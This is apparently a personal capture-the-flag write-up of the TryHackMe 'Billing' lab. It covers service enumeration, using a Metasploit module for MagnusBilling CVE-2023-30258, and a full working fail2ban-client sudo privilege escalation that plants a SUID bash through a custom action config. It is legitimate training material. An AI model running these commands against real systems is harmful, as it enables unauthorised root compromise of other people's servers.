# Hack Log 5 - TryHackMe [Billing](https://tryhackme.com/room/billing)

ðŸ“… **Date:** 2025-06-02   
ðŸ” **Objective:** Obtain user and root flag.  
ðŸŽ¯ **Target:** TryHackMe Billing (Lab CTF)

---

## ðŸ› ï¸ Actions Taken

-**Port & Service Enumeration**  
```
nmap -sV --script=http-enum 10.10.111.81
```
| Port | Service   |
|------|-----------|
| 22   | OpenSSH   |
| 80   | http      |
| 3036 | MySQL     |
| 5038 | Asterisk  |

â†’ Upon visiting http://10.10.111.81:80, found that Magnus Billing was running.  
â†’ It is an open-source VoIP billing platform designed to manage and automate billing for Asterisk-based telephony systems.  



-**Magnus Billing Remote Code Execution Discovery**  
â†’ Researched the web and found that Magnus Billing is vulnerable to remote code execution (CVE-2023-30258).  
â†’ There was an exploit entry present in Metasploit for the CVE.  

-**Exploitation**  
â†’ Executed the exploit and obtained a meterpreter shell as user "asterisk".   
â†’ Found user flag in "/home/magnus" directory.  

-**Privilege Escalation**  
â†’ Running "sudo -l" revealed that the user can run **file2ban-client** as sudo.  
â†’ Fail2ban is a security tool that monitors log files for suspicious activity and blocks IP addresses after repeated failed login attempts. It helps protect servers from brute-force attacks by automatically adding firewall rules.    
â†’ Upon researching discovered an approach to customize a config in the config directory of fail2ban and place code in it that is to be executed with root permissions. (https://juggernaut-sec.com/fail2ban-lpe/).  
â†’ Wasn't able to customize the config because the current user only had read-access to "/etc/fail2ban".  
â†’ Alternatively, found the way to copy the configuration directory to different location and then refer to the newly copied configuration directory.  
    - Copying the configuration directory.  
      ```
      rsync -av /etc/fail2ban/ /tmp/fail2ban/  
      ```  
      
    - Referring to the newly copied configuration directory.  
      ```
      sudo fail2ban-client -c /tmp/fail2ban -v restart
      ```  
â†’ Referring to the approach mentioned above wrote my own config which executes a script. which copies "/bin/bash" to "/tmp/bash" and turns it into SUID binary.  
    - Creating script /tmp/script  
    ``` 
    #!/bin/sh  
    cp /bin/bash /tmp/bash  
    chmod 755 /tmp/bash  
    chmod u+s /tmp/bash  
    ```  
    - Making the script executable  
    ```
    chmod +x /tmp/script  
    ```  
    - Creating a custom Fail2Ban action file named "custom-start-command.conf"    
    ```  
    cat > /tmp/fail2ban/action.d/custom-start-command.conf <<EOF  
    [Definition]  
    actionstart = /tmp/script  
    EOF    
    ```  
    - Appending a new custom jail configuration to the "jail.local" file in "/tmp/fail2ban" directory.    
    ```  
    cat >> /tmp/fail2ban/jail.local <<EOF
    [my-custom-jail]
    enabled = true
    action = custom-start-command
    EOF  
    ```  
    - Creating a custom Fail2Ban filter file with no actual filtering logic inside.  
    ```  
    cat > /tmp/fail2ban/filter.d/my-custom-jail.conf <<EOF  
    [Definition]  
    EOF  
    ```  
    - Restarting fail2ban using the custom configuration directory.  
    ```  
    sudo fail2ban-client -c /tmp/fail2ban/ -v restart  
    ```  
  â†’ Succesfully obtained the root shell and subsequently the root flag.  


## ðŸ” Key Findings  

- CVE-2023-30258, Magnus Billing Remote Code Execution.  
- Sudo using fail2ban-client.  


## ðŸ“š What I Learned  

- CVE-2023-30258 is a critical command injection vulnerability affecting MagnusBilling versions 6.x and 7.x.  
- This flaw allows unauthenticated remote attackers to execute arbitrary operating system commands via specially crafted HTTP requests.  
- Using fail2ban for privilege escalation.  
  - Following resources were very helpful.
    - https://0xb0b.gitbook.io/writeups/tryhackme/2025/billing
    - https://juggernaut-sec.com/fail2ban-lpe/
    
      
    
 




